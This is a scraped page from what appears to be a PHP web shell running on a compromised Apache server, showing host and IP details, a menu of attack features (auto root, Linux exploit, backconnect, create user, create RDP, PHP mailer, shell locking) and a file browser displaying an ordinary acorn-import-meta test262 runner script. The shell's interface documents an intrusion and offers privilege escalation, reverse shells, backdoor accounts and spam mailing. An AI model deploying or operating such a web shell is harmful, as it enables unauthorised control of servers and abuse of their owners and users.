Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
acorn-import-meta /
[ HOME SHELL ]
Name
Size
Permission
Action
index.js
1.63
KB
-rw-r--r--
package.json
865
B
-rw-r--r--
run_test262.js
797
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : run_test262.js
"use strict" const path = require("path") const run = require("test262-parser-runner") const acorn = require("acorn") const acornImportMeta = require(".") const Parser = acorn.Parser.extend(acornImportMeta) const unsupportedFeatures = [ "BigInt", "class-fields", "class-fields-private", "class-fields-public", "dynamic-import", "optional-catch-binding", "regexp-lookbehind", "regexp-named-groups", "regexp-unicode-property-escapes" ] run( (content, options) => Parser.parse(content, {sourceType: options.sourceType, ecmaVersion: 10}), { testsDirectory: path.dirname(require.resolve("test262/package.json")), skip: test => !test.attrs.features || !test.attrs.features.includes("import.meta") || unsupportedFeatures.some(f => test.attrs.features.includes(f)), } )
Close